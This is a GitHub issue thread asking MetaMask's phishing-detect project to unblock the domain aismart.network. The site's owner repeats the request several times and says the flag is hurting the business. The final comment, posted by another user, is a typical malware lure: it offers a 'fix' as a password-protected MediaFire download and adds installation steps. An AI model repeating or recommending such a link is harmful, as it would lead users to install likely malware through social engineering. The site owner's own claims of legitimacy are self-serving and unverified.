### ISSUE TITLE
[Legitimate Site Blocked] aismart.network

### ISSUE THREAD

**Issue by AiSmartOfficial** [MetaMask/eth-phishing-detect#80161]
https://aismart.network/

I am writing to bring to your attention a false phishing alert that has been associated with our website, [aismart.network](https://aismart.network/). We recently noticed that our domain has been flagged for phishing activities on your platform, which we believe is a mistake.

Please allow me to clarify that Aismart is a legitimate business dedicated to providing AI-driven products and services. Our team is committed to upholding the highest standards of security and integrity, and we have never engaged in or condoned any form of phishing or illegal activity.

Aismart is a newly established website focused on distributing AI-based products and offering rewards to our users. We are a dedicated team, continuously working to improve our platform and serve our community better. The flagging of our website seems to have been made without proper verification, leading to an unfair and detrimental situation for our business.

We kindly request that you review this case and remove the phishing flag from our website. We are more than willing to cooperate fully and provide any necessary documentation or information to assist with your investigation.

Thank you for your attention to this matter. We look forward to your prompt response and the swift resolution of this issue.

**Comment by AiSmartOfficial** [comment]
Update : we're also adding a landing page with full privacy policy and terms of service conditions . plus we do not ask for additional information from the user, we are a funding community where we provide ai solutions, user is not forced to register on our website, they will confirm for every transaction they make on the website .


This false flagging is damaging our business and is causing us to lose our investors

**Comment by AiSmartOfficial** [comment]
@409H @deshvin i will appreciate a blocklist removal ,

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
